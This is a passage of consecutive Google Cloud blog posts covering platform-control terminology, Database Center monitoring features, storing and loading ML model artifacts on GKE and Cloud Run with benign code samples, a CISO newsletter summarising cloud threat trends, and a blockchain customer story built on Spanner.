Shielded GKE Nodes / Shielded VMs: Enforces secure boot and integrity checks, preventing the node from starting if its boot sequence is compromised.
Artifact Registry (when used to block vulnerable dependencies): Can be configured to block builds if dependencies with critical vulnerabilities are found.
3. Safety nets: Detection and response airbags
Finally, because failures and threats are inevitable, we need safety nets. A safety net is a reactive control that activates after an error or failure has already occurred. Its purpose is not to prevent the initial event, but to detect the problem, mitigate its impact, and facilitate a swift recovery. Continuing with the car analogy, if a golden path is the well-marked road and a guardrail is the concrete barrier, the safety net is the airbag and seatbelt — it doesn’t prevent the crash, but it dramatically reduces the harm. This category includes monitoring systems that alert on failures, automated rollback mechanisms, backup and restore procedures, and security systems that detect intrusions. The focus is on resilience and damage limitation.
These tools are used to detect and mitigate failures or threats after they have occurred.
Cloud Monitoring: Detects performance degradation, failures, and anomalies and sends alerts.
Cloud Logging: Provides the raw data to detect and investigate incidents after they happen.
Security Command Center (SCC): Acts as the central hub for detecting and viewing existing misconfigurations, vulnerabilities, and threats across Google Cloud.
Firebase Test Lab: Detects issues in mobile applications by running tests on real and virtual devices.
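As a simple illustration of the reactive, safety-net pattern, the sketch below uses the Cloud Logging Python client to pull recent high-severity entries, the kind of post-incident signal that would feed an alert, a rollback, or an investigation. The filter and resource type are hypothetical examples:

# Minimal sketch: query recent high-severity log entries as a safety-net check.
# Assumes the google-cloud-logging client library; the filter is hypothetical.
from google.cloud import logging

client = logging.Client()
log_filter = 'severity>=ERROR AND resource.type="k8s_container"'

for entry in client.list_entries(
    filter_=log_filter, order_by=logging.DESCENDING, max_results=20
):
    # Each entry carries the timestamp, severity, and payload needed to
    # investigate the failure and trigger mitigation (rollback, paging, etc.).
    print(entry.timestamp, entry.severity, entry.payload)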
Understanding the unique purpose of these three automated control mechanisms — golden paths (steering), guardrails (prevention), and safety nets (post-event detection and recovery) — clarifies the intent behind every tool we implement and empowers us to build a platform that is both fast and safe.
Beyond automated controls: Manual checkpoints and reviews
Everything that we’ve discussed thus far — golden paths, guardrails, and safety nets — almost always refers to automated controls: control points programmatically integrated into the platform’s workflow, providing speed, consistency, and efficiency. However, other control points inherently require human judgment, oversight, and intervention — think budget approvals, architecture reviews, or security post-mortems. As such, manual processes are still a crucial component of a comprehensive governance framework, allowing people to judge complex scenarios. Manual checkpoints and reviews help provide accountability, holistic risk assessments, and audit trails in ways that automated systems alone cannot guarantee (albeit often at the cost of added friction).
Here are some examples of scenarios where you may want to implement manual checkpoints and reviews:
FinOps cost visibility and allocation: Using tools to track cloud spending and allocate costs to specific teams or projects. Here, the Google Cloud FinOps Hub can serve as a centralized dashboard.
FinOps budgeting and forecasting: Setting budgets and forecasting future cloud costs to prevent overspending.
FinOps cost optimization: Implementing strategies to reduce cloud costs, such as rightsizing resources, using reserved instances, and automating a “lights on/lights off” approach to your cloud infrastructure.
Architectural reviews: Formal sessions where architects and senior engineers review proposed system designs. To provide a structured approach, these reviews are often guided by the Google Cloud Well-Architected Framework, where reviewers assess the design against its core pillars: security, reliability, cost optimization, performance, and operational excellence. This involves validating specific aspects, such as the design of air-gapped environments, ensuring reliability requirements are met, and confirming cost-effectiveness. These sessions provide a critical check for complex system interactions that automated tools might miss.
Code reviews (manual): While automated tools catch many issues, it’s critical for a real person to review code changes. Reviewers can identify subtle logic errors, potential race conditions, adherence to non-automatable coding standards or architectural patterns, and opportunities for knowledge sharing and mentoring.
Security assessments: Activities like manual penetration testing, targeted vulnerability assessments, and threat modeling performed by specialized security teams or third-party experts. These assessments simulate real-world attacks and probe for weaknesses that automated scanners might overlook, providing deep insights into the platform’s security posture.
Change management: Formal processes for reviewing, approving, and scheduling significant changes to production environments, often involving a Change Advisory Board (CAB). The process includes assessing the potential risk and impact of changes, ensuring rollback plans are in place, and coordinating deployments. Backlog review and prioritization also fall into this category, as they involve human judgment on strategic direction.
Compliance audits: Verifying adherence to regulatory requirements (like PCI-DSS or HIPAA), which often involves manual inspection of configurations, processes, and collected evidence by internal or external auditors. Even if data gathering is automated via tools like Security Command Center, interpretation and sign-off typically require human auditors.
License management: Ensuring compliance with third-party software licenses, which can involve manual tracking, inventory management, and validation processes (although tools can assist).
The challenge lies in balancing these manual processes with the need for agility. Overly burdensome manual gates can become significant bottlenecks, slowing down delivery pipelines. Platform teams should continuously evaluate manual processes, seeking opportunities for streamlining or partial automation, all while ensuring they still provide their intended value in risk mitigation and governance.
From theory to practice
Ultimately, platform engineering is about balancing developer velocity with robust governance. A successful strategy on Google Cloud depends not on a single type of control, but on a thoughtful blend of different mechanisms. By implementing low-friction golden paths to steer developers, hard-stop guardrails to prevent disaster, and resilient safety nets for swift recovery, we create a layered and effective platform-control framework. By thoughtfully combining these automated and manual controls on Google Cloud, we can build a platform that truly empowers developers without sacrificing security or stability.
In the meantime, consider these strategies for adding extra layers of control to your platform — without placing an undue burden on developers.
Adopt the new vocabulary: Before using the term “guardrail”, stop and consider whether you’re reaching for a catch-all, or whether golden path, safety net, or manual checkpoint more precisely describes the control you mean.
Audit your existing controls: Use this new framework as a lens to evaluate your current platform.
Build with intent: Consciously decide which type of control is most appropriate for each situation.
Balance and optimize: Continuously evaluate the balance between automated controls and manual checkpoints. Strive to build a platform that empowers developers through the software lifecycle with self-service and speed, rather than putting up yet another wall.
Database Center is an AI-powered unified fleet management solution that can help you identify and address security risks, performance bottlenecks, and reliability issues for Google Cloud databases including Cloud SQL, AlloyDB, Spanner, Bigtable, Memorystore, and Firestore. Today, we are excited to announce that Database Center can now monitor your self-managed MySQL, PostgreSQL, and SQL Server databases on Google Compute Engine. In addition, we’re also unveiling several new usability enhancements. Let’s dive in!
Expanded coverage: Support for self-managed databases
Many customers run their PostgreSQL, MySQL and SQL Server databases on Compute Engine VMs, and have asked for support for monitoring them. Database Center’s monitoring capabilities now extend to these self-managed databases, giving you a holistic view of your entire database estate, both managed and self-managed, from a single, unified interface. Database Center can now also proactively detect and help troubleshoot common security vulnerabilities in databases hosted on Compute Engine VMs, including:
Outdated minor versions: Automatically identify databases running on older minor versions, which may lack the latest security patches.
Auditing not enabled: Flag databases where auditing is not enabled, a critical component for security and compliance.
Broad IP access range: Detect overly permissive IP access ranges, a common security risk that can expose your databases to unauthorized access.
No root password: Identify databases without a root password, a significant security risk.
Allows unencrypted direct connections: Highlight databases that permit unencrypted direct connections.
By bringing your self-managed databases on Compute Engine into the fold, Database Center helps you monitor security and drive operational rigor across your entire database fleet, improving your security posture and simplifying compliance.
This capability is currently in preview, and you can sign up for early access. To enable monitoring of self-managed databases, a lightweight VM agent must be installed. Please see the Database Center documentation or the console for more details.
Alerting for new resources and issues across all databases
To help you stay ahead of potential issues, Database Center now lets you create custom alerts for:
New database resources: Get notified whenever a new database (specific product/version/region) is provisioned in your project, helping to ensure that you have full visibility and control over your database landscape.
New signals: Receive alerts (email, Slack, or Google Chat messages, etc.) for any new issue types detected by Database Center, enabling you to take immediate action and mitigate risks before they impact your applications.
These new alerting capabilities provide you with the proactive monitoring you need to maintain a highly performant, reliable, secure, and compliant database environment.
Simplify fleet monitoring at scale using folder-level chat
Database Center’s Gemini-powered natural language capabilities are now available at the folder level. This means you can now have contextual conversations about your databases within a specific folder, making it easier to manage and troubleshoot databases, especially in large and complex organizational environments.
Historical fleet comparison of up to 30 days
We’ve significantly enhanced Database Center’s historical comparison feature to aid in capacity planning and the analysis of database fleet health. We previously offered a seven-day historical comparison for database inventory and issues; now you can choose between 1-day, 7-day, and 30-day historical comparisons.
With the user-friendly time range picker, you can get a detailed comparison of:
New database inventory: See exactly which databases have been added to your fleet since the selected date.
New issues detected: Identify new security and operational issues that have emerged over the chosen time period.
This expanded historical view provides you with valuable insights into the evolution of your database fleet, enabling you to track trends, identify patterns, and make more informed decisions.
Get started today
These new features are designed to provide you with a more comprehensive, intelligent, and proactive database management experience. We’re confident that they will make it easier to manage your database fleet, help reduce your security risks, and improve the overall performance and availability of your applications. Please note that Database Center is available to use at no additional cost for Google Cloud customers.
To get started with these new features, please refer to the Database Center documentation.
Managing large model artifacts is a common bottleneck in MLOps. Baking models into container images leads to slow, monolithic deployments, and downloading them at startup introduces significant delays. This guide explores a better way: decoupling your models from your code by hosting them in Cloud Storage and accessing them efficiently from GKE and Cloud Run. We’ll compare various loading strategies, from traditional methods to the high-performance Cloud Storage FUSE CSI driver, to help you build a more agile and scalable ML serving platform.
Optimizing the artifact
To optimize the artifact, we recommend that you centralize it in Cloud Storage, and then use quantization and cache warming.
Centralizing in Cloud Storage
The most important step toward a scalable ML serving architecture is to treat the model artifact as a first-class citizen, with its own lifecycle, independent of the application code. The best way to do this is to use Cloud Storage as the central, versioned, and secure source of truth for all model assets, such as .safetensors, .gguf, .pkl, or .joblib files.
This architectural pattern does more than just provide a convenient place to store files. It establishes a unified model plane that is logically separate from the compute plane where inference occurs. The model plane is hosted on Cloud Storage, and it handles the governance of the ML asset: its versioning, storage durability, and access control.
The compute plane—be it GKE, Cloud Run, Vertex AI, or even a local development machine—handles execution: loading the model into GPU memory and processing inference requests. This separation provides immense strategic flexibility. The same versioned model artifact in a Cloud Storage bucket can be consumed by a GKE cluster for a high-throughput batch prediction job; by a Cloud Run service for bursty, real-time inference; and by a fully managed Vertex AI Endpoint for ease of use, all without duplicating the underlying asset. This storage method prevents model sprawl and ensures that all parts of the organization are working from a single, auditable source.
To implement this architecture effectively, you need a structured approach to artifact organization. Best practices suggest the use of a Cloud Storage bucket structure that facilitates robust MLOps workflows. This approach includes using clear naming conventions that incorporate model names and versions (for example, a bucket named gs://my-model-artifacts/gemma-2b/v1.0/) and separate prefixes or even distinct buckets for different environments (such as dev, staging, and prod).
With this approach, access control should be managed with precision using Identity and Access Management (IAM) policies. For example, CI/CD service accounts for production deployments should only have read access to the production models bucket, data scientists might have write access only to development or experimentation buckets, and automated tests should gate promotion of development images to production pipelines.
You can also make specific objects or entire buckets publicly readable through IAM roles like roles/storage.objectViewer assigned to the allUsers principal, though this should be used with caution. This disciplined approach to storage and governance transforms Cloud Storage from a simple file repository into the foundational layer of a scalable and secure MLOps ecosystem.
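As a sketch of what this looks like in practice, the snippet below uploads a model artifact under a versioned prefix and grants a serving identity read-only access, assuming the google-cloud-storage client library; the bucket, paths, and service account are hypothetical:

# Minimal sketch: publish a versioned artifact and grant read-only access.
# Bucket, object path, and service account are hypothetical placeholders.
from google.cloud import storage

client = storage.Client()
bucket = client.bucket("my-model-artifacts")

# Upload the artifact under a clear model/version prefix.
blob = bucket.blob("gemma-2b/v1.0/model.safetensors")
blob.upload_from_filename("model.safetensors")

# Grant the serving service account read-only access to the bucket.
policy = bucket.get_iam_policy(requested_policy_version=3)
policy.bindings.append({
    "role": "roles/storage.objectViewer",
    "members": {"serviceAccount:serving@my-project.iam.gserviceaccount.com"},
})
bucket.set_iam_policy(policy)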
That scalability is critical for performance, especially when serving large models. Model load is a bursty, high-throughput workload, with up to thousands of GPUs trying to load the same model weights simultaneously as quickly as possible. Anywhere Cache, which can provide up to 2.5 TB/s of bandwidth at lower latency, should always be used for this scenario. As a managed, SSD-backed caching layer for Cloud Storage, Anywhere Cache colocates data with your compute resources. It transparently serves read requests from a high-speed local cache, benefiting any Cloud Storage client in the zone — including GKE, Compute Engine, and Vertex AI — and dramatically reducing model load times.
Quantization
Quantization is the process of reducing the precision of a model’s weights (for example, from 32-bit floating point to 4-bit integer). From a storage perspective, the size of a model’s weights is a function of its parameters and their precision (precision × number of parameters = model size). By reducing the precision, you can dramatically shrink the model’s storage footprint.
Quantization has two major benefits:
Smaller model size: A quantized model takes up significantly less disk space, leading to faster downloads and less memory consumption.
Faster inference: Many modern CPUs and GPUs can perform integer math much faster than floating-point math.
For the best results, use modern, quantization-aware model formats like GGUF, which are designed for fast loading and efficient inference.
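To make the size formula concrete, here is a small back-of-the-envelope calculation for a hypothetical 2-billion-parameter model at different precisions:

# Back-of-the-envelope model sizes: parameters x bytes per parameter.
params = 2_000_000_000  # hypothetical 2B-parameter model

for label, bytes_per_param in [("FP32", 4), ("FP16", 2), ("INT8", 1), ("4-bit", 0.5)]:
    size_gb = params * bytes_per_param / 1e9
    print(f"{label}: ~{size_gb:.0f} GB of weights")

# FP32: ~8 GB, FP16: ~4 GB, INT8: ~2 GB, 4-bit: ~1 GB. Quantization shrinks
# both the download time and the memory footprint roughly in proportion.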
Cache warming
For many LLMs, the initial processing of a prompt is the most computationally expensive part. You can pre-process common prompts or a representative sample of your data during the build process and save the resulting cache state. Your application can then load this warmed cache at startup, allowing it to skip the expensive initial processing for common requests. Serving frameworks like vLLM provide capabilities like automatic prefix caching that support this.
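For example, a minimal vLLM setup with prefix caching enabled might look like the following sketch; the model name and prompts are placeholders rather than a recommended configuration:

# Minimal sketch: vLLM with automatic prefix caching, so a shared prompt
# prefix (e.g., a long system prompt) is processed once and reused.
from vllm import LLM, SamplingParams

llm = LLM(model="google/gemma-2b", enable_prefix_caching=True)  # placeholder model

system_prompt = "You are a helpful assistant for our support portal.\n"
prompts = [
    system_prompt + "How do I reset my password?",
    system_prompt + "How do I update my billing details?",
]

# The cached prefix lets later requests skip the most expensive prompt processing.
outputs = llm.generate(prompts, SamplingParams(max_tokens=64))
for out in outputs:
    print(out.outputs[0].text)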
Loading the artifact
Choosing the right model loading strategy is a critical architectural decision. Here’s a breakdown of the most common approaches:
Cloud Storage FUSE CSI driver: The recommended approach for most modern ML serving workloads on GKE is to use the Cloud Storage FUSE CSI driver. This approach mounts a Cloud Storage bucket directly into the pod’s filesystem as a volume, so the application can read the model as if it were a local file. This implementation provides near-instantaneous pod startup and fully decouples the model from the code.
init container download: A more flexible approach is to use a Kubernetes init container to download the model from Cloud Storage to a shared emptyDir volume before the main application starts. This implementation decouples the model from the image, so that you can update the model without rebuilding the container. However, this implementation can significantly increase pod startup time and add complexity to your deployment. This approach is a good option for medium-sized models where the startup delay is acceptable.
Concurrent download: Similar to the init container, you can download the model concurrently within your application. This approach can be faster than a simple gsutil cp command because it allows for parallelization. A prime example of this is the vLLM Run:ai Model Streamer, which you can enable when you use the vLLM serving framework. This feature parallelizes the download of large model files by splitting them into chunks and fetching them concurrently, which significantly accelerates the initial load (see the sketch after this list).
Baking into the image: The simplest approach is to copy the model directly into the container image during the docker build process. This approach makes the container self-contained and portable, but it also creates very large images, which can be slow to build and transfer. This tight coupling of the model and code also means that any model update requires a full image rebuild. This strategy is best for small models or quick prototypes where simplicity is the top priority.
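Here is the sketch referenced in the concurrent download item above. It uses the Cloud Storage Python client’s transfer manager rather than the Run:ai Model Streamer itself, and the bucket, object, and local path are hypothetical:

# Minimal sketch: application-level concurrent download of a large model file
# in parallel chunks. Names are placeholders, not a specific recommendation.
from google.cloud import storage
from google.cloud.storage import transfer_manager

client = storage.Client()
bucket = client.bucket("my-model-artifacts")
blob = bucket.blob("gemma-2b/v1.0/model.safetensors")

# Fetch the object in parallel chunks with a pool of workers, which is
# typically much faster than a single-stream copy for multi-GB files.
transfer_manager.download_chunks_concurrently(
    blob, "/models/model.safetensors", max_workers=8
)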
Direct access with Cloud Storage FUSE
The Cloud Storage FUSE CSI driver is a significant development for ML workloads on GKE. It lets you mount a Cloud Storage bucket directly into your pod’s filesystem, so that the objects in the bucket appear as local files. This configuration is accomplished by injecting a sidecar container into your pod that manages the FUSE mount. This setup eliminates the need to copy data, resulting in near-instantaneous pod startup times.
It’s important to note that although the Cloud Storage FUSE CSI driver is compatible with both GKE Standard and Autopilot clusters, Autopilot’s security constraints prevent the use of the SYS_ADMIN capability, which is typically required by FUSE. The CSI driver is designed to work without this privileged access, but it’s a critical consideration when you deploy to Autopilot.
Performance tuning
Out of the box, Cloud Storage FUSE is a convenient way to access your models. But to unlock its full potential for read-heavy inference workloads, you need to tune its caching and prefetching capabilities.
Parallel downloads: For very large model files, you can enable parallel downloads to accelerate the initial read from Cloud Storage into the local file cache. This is enabled by default when file caching is enabled.
Metadata caching & prefetching: The first time that you access a file, FUSE needs to get its metadata (like size and permissions) from Cloud Storage. To keep the metadata in memory, you can configure a stat cache. For even better performance, you can enable metadata prefetching, which proactively loads the metadata for all files in a directory when the volume is mounted. You can enable metadata prefetching by setting the metadata-cache:stat-cache-max-size-mb and metadata-cache:ttl-secs options in your mountOptions configuration.
For more information, see the Performance tuning best practices in the Cloud Storage documentation. For an example of a GKE Deployment manifest that mounts a Cloud Storage bucket with performance-tuned FUSE settings, see the sample configuration YAML files.
Advanced storage on GKE
Cloud Storage FUSE offers a direct and convenient way to access model artifacts. GKE also provides specialized, high-performance storage solutions designed to eliminate I/O bottlenecks for the most demanding AI/ML workloads. These options, Google Cloud Managed Lustre and Hyperdisk ML, offer alternatives that can provide high performance and stability by leveraging dedicated parallel file and block storage.
Managed Lustre
For the most extreme performance requirements, Google Cloud Managed Lustre provides a fully managed, parallel file system. Managed Lustre is designed for workloads that demand ultra-low, sub-millisecond latency and massive IOPS, such as HPC simulations and AI training and inference jobs. It’s POSIX-compliant, which ensures compatibility with existing applications and workflows.
This service, powered by DDN’s EXAScaler, scales to multiple PBs and streams data up to 1 TB/s, making it ideal for large-scale AI jobs that need to feed hungry GPUs or TPUs. It’s intended for high-throughput data access rather than long-term storage archiving. Although its primary use case is persistent storage for training data and checkpoints, it can handle millions of small files and random reads with extremely low latency and high throughput. It’s therefore a powerful tool for complex inference pipelines that might need to read or write many intermediate files.
To use Managed Lustre with GKE, you first enable the Managed Lustre CSI driver on your GKE cluster. Then, you define a StorageClass resource that references the driver and a PersistentVolumeClaim request to either dynamically provision a new Lustre instance or connect to an existing one. Finally, you mount the PersistentVolumeClaim as a volume in your pods, which lets them access the high-throughput, low-latency parallel file system.
Hyperdisk ML
Hyperdisk ML is a network block storage option that’s purpose-built for AI/ML workloads, particularly for accelerating the loading of static data like model weights. Unlike Cloud Storage FUSE, which provides a file system interface to an object store, Hyperdisk ML provides a high-performance block device that can be pre-loaded, or hydrated, with model artifacts from Cloud Storage.
Its standout feature for inference serving is its support for READ_ONLY_MANY access, which allows a single Hyperdisk ML volume to be attached as a read-only device to up to 2,500 GKE nodes concurrently. In this architecture, every pod can access the same centralized, high-performance copy of the model artifact without duplication. You can therefore use it to scale out stateless inference services that deliver high throughput even with smaller, terabyte-sized volumes. Note that the read-only nature of Hyperdisk ML introduces operational process changes each time a model is updated.
To integrate Hyperdisk ML, you first create a Hyperdisk ML volume and populate it with your model artifacts from Cloud Storage. Then you define a StorageClass resource and a PersistentVolumeClaim request in your GKE cluster to make the volume available to your pods. Finally, you mount the PersistentVolumeClaim as a volume in your Deployment manifest.
Serving the artifact on Cloud Run
Cloud Run also supports mounting Cloud Storage buckets as volumes, which makes it a viable platform for serving ML models, especially with the addition of GPU support. You can configure a Cloud Storage volume mount directly in your Cloud Run service definition. This implementation provides a simple and effective way to give your serverless application access to the models that are stored in Cloud Storage.
Here is an example of how to mount a Cloud Storage bucket as a volume in a Cloud Run service by using the gcloud command-line tool:
gcloud run deploy my-ml-service \
  --image gcr.io/my-project/my-ml-app:latest \
  --add-volume=name=model-volume,type=cloud-storage,bucket=my-gcs-bucket \
  --add-volume-mount=volume=model-volume,mount-path=/models
Automating the artifact lifecycle
To automate the artifact lifecycle, you build an ingestion pipeline that includes a scripted Cloud Run job, and then you stream directly to Cloud Storage.
Building an ingestion pipeline
For a production environment, you need an automated, repeatable process for ingesting models, which you can build by using a Cloud Run job. The core of this pipeline is a Cloud Run job that runs a containerized script. This job can be triggered manually or on a schedule to create a robust, serverless pipeline for transferring models from Hugging Face into your Cloud Storage bucket.
Streaming directly to Cloud Storage
Instead of downloading the entire model to the Cloud Run job’s local disk before uploading it to Cloud Storage, we can stream it directly. The obstore library is perfect for this. It lets you treat a Hugging Face repository and a Cloud Storage bucket as object stores and stream data between them asynchronously. This is highly efficient, especially for very large models, because it minimizes local disk usage and maximizes network throughput.
Here is a simplified Python snippet that shows the core logic of streaming a file from Hugging Face to Cloud Storage by using the obstore library:
import os
import asyncio
from urllib.parse import urlparse
from huggingface_hub import hf_hub_url
import obstore as obs
from obstore.store import GCSStore, HTTPStore

async def stream_file_to_gcs(file_name, hf_repo_id, gcs_bucket_name, gcs_path_prefix):
    """Streams a file from a Hugging Face repo directly to Cloud Storage."""

    # 1. Configure the source (Hugging Face) and destination (Cloud Storage) stores
    http_store = HTTPStore.from_url("https://huggingface.co")
    gcs_store = GCSStore(bucket=gcs_bucket_name)

    # 2. Get the full download URL for the file
    full_download_url = hf_hub_url(repo_id=hf_repo_id, filename=file_name)
    download_path = urlparse(full_download_url).path

    # 3. Define the destination path in Cloud Storage
    gcs_destination_path = os.path.join(gcs_path_prefix, file_name)

    # 4. Get the download stream from Hugging Face
    streaming_response = await obs.get_async(http_store, download_path)

    # 5. Stream the file to Cloud Storage
    await obs.put_async(gcs_store, gcs_destination_path, streaming_response)

    print(f"Successfully streamed '{file_name}' to Cloud Storage.")

# Example usage:
# asyncio.run(stream_file_to_gcs("model.safetensors", "google/gemma-2b", "my-gcs-bucket", "gemma-2b-model/"))
Conclusion
By moving your model artifacts out of your container images and into a centralized Cloud Storage bucket, you gain a tremendous amount of flexibility and agility. This decoupled approach simplifies your CI/CD pipeline, accelerates deployments, and lets you manage your code and models independently.
For the most demanding ML workloads on GKE, the Cloud Storage FUSE CSI driver is an excellent choice, providing direct, high-performance access to your models without a time-consuming copy step. For even greater performance, consider using Managed Lustre or Hyperdisk ML. When you combine these options with an automated ingestion pipeline and build-time best practices, you can create a truly robust, scalable, and future-proof ML serving platform on Google Cloud.
The journey to a mature MLOps platform is an iterative one. By starting with a solid foundation of artifact-centric design, you can build a system that is not only powerful and scalable today, but also adaptable to the ever-changing landscape of machine learning. Share your tips on managing model artifacts with me on LinkedIn, X, and Bluesky.
Welcome to the first Cloud CISO Perspectives for August 2025. Today, our Office of the CISO’s Bob Mechler and Anton Chuvakin dive into the key trends and evolving threats that we tracked in our just-published Cloud Threat Horizons report.
As with all Cloud CISO Perspectives, the contents of this newsletter are posted to the Google Cloud blog. If you’re reading this on the website and you’d like to receive the email version, you can subscribe here.
New Cloud Threat Horizons details evolving threats — and defenses
By Bob Mechler, director, Office of the CISO, and Anton Chuvakin, security advisor, Office of the CISO
Threat actors are leaning into cyberattacks against cloud service providers and honing their tactics to specifically target recovery mechanisms and supply chains — often to achieve high-value compromises.
That’s one of the top conclusions from our newest Threat Horizons Report, a free biannual publication sharing strategic intelligence on cloud threats that draws on research from Google Cloud’s Office of the CISO, Google Threat Intelligence Group (GTIG), Mandiant Consulting, and intelligence, security, and product teams.
These cyberattacks are starting from a frustratingly familiar place: Credential compromise and misconfiguration are still the leading entry points for threat actors in cloud environments.
“During the first half of 2025, weak or absent credentials were the predominant threat, accounting for 47.1% of incidents. Misconfigurations (29.4%) and API/UI compromises (11.8%) followed as the next most-frequently observed initial access vectors,” the report said.
These findings closely mirror our observations in previous Cloud Threat Horizons Reports, emphasizing the critical need for robust identity and access management and proactive vulnerability management.
The new report takes stock of the state of cloud security, and focuses on actionable recommendations for leaders and practitioners. As threat actors advance their methods for data exfiltration, identity compromise, supply chain attacks, and improving evasion and persistence techniques, Google Cloud security experts offer four critical insights into these evolving risks, supported by threat intelligence and risk mitigations.
1. Foundational vulnerabilities persist
A persistent challenge is the continued exploitation of basic security weaknesses in the cloud. Despite defensive advancements, the primary entry points for threat actors — credential compromise and misconfiguration — are driven by a lack of attention to cloud security fundamentals.
As we noted, these foundational issues accounted for a significant portion of incidents in the first half of 2025. Too many organizations struggle with these basics, and we cannot emphasize enough the importance of robust identity and access management and proactive vulnerability management. Reach out to your cloud provider to ensure your metaphorical windows and doors are locked.
2. Attacking backups to pressure victims
Threat actors are increasingly targeting backup infrastructure to hinder recovery efforts. Financially-motivated attackers are now routinely compromising backup systems so that organizations can’t restore data after a ransomware attack, coercing them into capitulating.
This shift emphasizes the critical importance of business continuity. Our report highlights the need for solutions, including Cloud Isolated Recovery Environment (CIRE), to provide a secure restore point. A robust disaster recovery plan, rooted in layered security, should go beyond relying solely on cloud backups.
3. MFA is effective, but not invulnerable
Multi-factor authentication (MFA) is a highly effective security measure. However, threat actors are developing more sophisticated methods to bypass it, particularly through social engineering to steal credentials and session cookies.
For example, the North Korean threat actor group UNC4899 used social media to trick employees into running malicious Docker containers and then steal the victim’s credentials and session cookies to gain access to cloud environments. In some instances, they used credential and cookie theft to bypass weaker MFA methods to avoid detection.
As Google Cloud and Workspace take steps to add additional layers of protection to the MFA process with passkeys and device-bound session credentials, cloud customers should also adopt a comprehensive defense-in-depth strategy. Robust session management and enhanced user awareness training can prove vital to mitigating MFA threats.
4. Evolving supply chain attacks
The supply chain continues to be a significant area of risk, and we’ve observed threat actors using trusted cloud services to host decoy files and payloads. The new Cloud Threat Horizons report details campaigns where seemingly-benign PDFs on legitimate cloud platforms were used to distract victims while malicious payloads were downloaded — a classic trust-exploitation attack.
It shouldn’t come as a surprise that adversaries are evolving their tactics to target personnel, recovery plans, and the inherent trust in platforms. CISOs and security leaders should encourage their organizations to evolve as well, from addressing individual vulnerabilities to building a resilient, end-to-end security program prepared for today’s threat landscape.
Level up your cloud security today
Effectively navigating today’s threats means that organizations should adopt a defense-in-depth strategy that prioritizes identity security, robust recovery mechanisms, continuous vigilance against sophisticated social engineering and deception tactics, and supply chain integrity.
For more details on the threats facing cloud providers and users, and mitigations for those risks, you can download the new Cloud Threat Horizons report here.
In case you missed it
Here are the latest updates, products, services, and resources from our security teams so far this month:
Your guide to Security Summit 2025: AI can help empower defenders, and also create new security challenges. Join us for this year’s Security Summit as we focus on those themes. Read more.
Complex, hybrid manufacturing needs strong security. Here’s how CISOs can get it done: Our Office of the CISO has developed actionable security guidance for hybrid manufacturing OT networks. Here’s what you need to know. Read more.
Forrester study: Customers cite 240% ROI with Google Security Operations: A new Forrester Consulting study on Google Security Operations found a 240% ROI over three years, with a net present value (NPV) of $4.3 million. Read more.
Google Cloud’s commitment to EU AI Act support: We intend to sign the European Union AI Act Code of Practice. Here’s what our European customers should know. Read more.
Introducing audit-only mode for Access Transparency: A new, lightweight audit-only mode for Access Approval enables access approvals in an “on demand only” model. Read more.
Best practices to prevent dangling bucket takeovers: Storage buckets are where your data lives in the cloud, but sometimes they get forgotten. Here’s how to secure them against dangling bucket attacks. Read more.
New patch rewards program for OSV-SCALIBR: Participants in the program will be eligible to receive a financial reward for providing novel OSV-SCALIBR plugins for inventory, vulnerability, and secret detection. Read more.
Android’s pKVM first globally-certified software to earn SESIP Level 5: With this level of security assurance, Android is now positioned to securely support the next generation of high-criticality isolated workloads. This includes vital features, such as on-device AI workloads that can operate on ultra-personalized data, with the highest assurances of privacy and integrity. Read more.
Please visit the Google Cloud blog for more security stories published this month.
Exposing the risks of VMware vSphere Active Directory integration: The common practice of directly integrating vSphere with Microsoft Active Directory can simplify administration tasks, but also creates an attack path frequently underestimated due to misunderstanding the inherent risks. Read more.
Defending your VMware vSphere estate from UNC3944: Take a deep dive into the anatomy of UNC3944’s vSphere-centered attacks, and study our fortified, multi-pillar defense strategy for risk mitigation. Read more.
Ongoing SonicWall SMA exploitation campaign using the OVERSTEP backdoor: Google Threat Intelligence Group (GTIG) has identified an ongoing campaign by a suspected financially-motivated threat actor we track as UNC6148, targeting fully patched end-of-life SonicWall Secure Mobile Access (SMA) 100 series appliances. Read more.
Please visit the Google Cloud blog for more threat intelligence stories published this month.
Now hear this: Podcasts from Google Cloud
Google lessons for using AI agents to secure our enterprise: What can AI agents do for your organization’s security? Dominik Swierad, product development and strategy lead, AI and Sec-Gemini, joins hosts Anton Chuvakin and Tim Peacock for a lively chat on the state of using AI agents to improve security. Listen here.
Making security personal, the TikTok way: Kim Albarella, global head of security, TikTok, discusses security strategies, appropriate metrics, and balancing the need for localized compliance with the desire for a consistent global security posture with Anton and Tim. Listen here.
Defender’s Advantage: Securing protection relays in modern substations: Host Luke McNamara is joined by members of Mandiant Consulting’s Operational Technology team to discuss securing assets in the energy grid. Listen here.
To have our Cloud CISO Perspectives post delivered twice a month to your inbox, sign up for our newsletter. We’ll be back in a few weeks with more security-related updates from Google Cloud.
Keeta Network is a layer‑1 blockchain that unifies transactions across different blockchains and payment systems, eliminating the need for costly intermediaries, reducing fees, and enabling near‑instant settlements. By facilitating cross‑chain transactions and interoperability with existing payment systems, Keeta bridges the gap between cryptocurrencies and fiat, enabling a secure, efficient, and compliant global financial ecosystem.
Founded in 2022 and backed by Eric Schmidt, the former CEO of Google, Keeta has engineered its network to meet the stringent regulatory and operational requirements of financial institutions. Its on‑chain compliance protocols, including Know Your Customer (KYC) and Anti-Money Laundering (AML), ensure security and regulatory adherence. Keeta’s architecture also natively supports asset tokenization and digital identity, making it an ideal platform for stablecoins and real‑world asset transfers.
Recently, the company conducted a public, verified stress test of its network, which runs on Spanner, Google Cloud’s horizontally scalable, highly available operational database. The test demonstrated Keeta Network is capable of over 11 million transactions per second (TPS), significantly outperforming traditional layer-1 blockchains and opening new opportunities for what is possible with blockchain technology.
Keeta chose Spanner to power its distributed ledger due to its availability and elastic scalability, allowing the team to scale up or down as needed without downtime, costly over-provisioning, or risky manual administration. Google Cloud was also instrumental in helping to prepare and execute Keeta’s stress test, providing world-class infrastructure and technical guidance that helped validate the network’s real-world performance.
With Spanner’s fully managed operations and familiar relational developer experience, Keeta was able to focus on its network — not database infrastructure or distributed systems. At peak, Spanner handled 300,000 queries per second, reading and writing durable state to read balances, check permissions, resolve conflicts, and publish votes.
Building one network, ready for anything
On its mission to be the blockchain that connects all networks, Keeta created a unified platform that serves as a common ground for all payment networks and assets. Keeta Network’s underlying architecture is built on a directed acyclic graph (DAG) structure. Unlike traditional blockchain architecture, a DAG can process transactions in parallel across many individual accounts, reducing latency and avoiding common bottlenecks that plague other existing solutions.
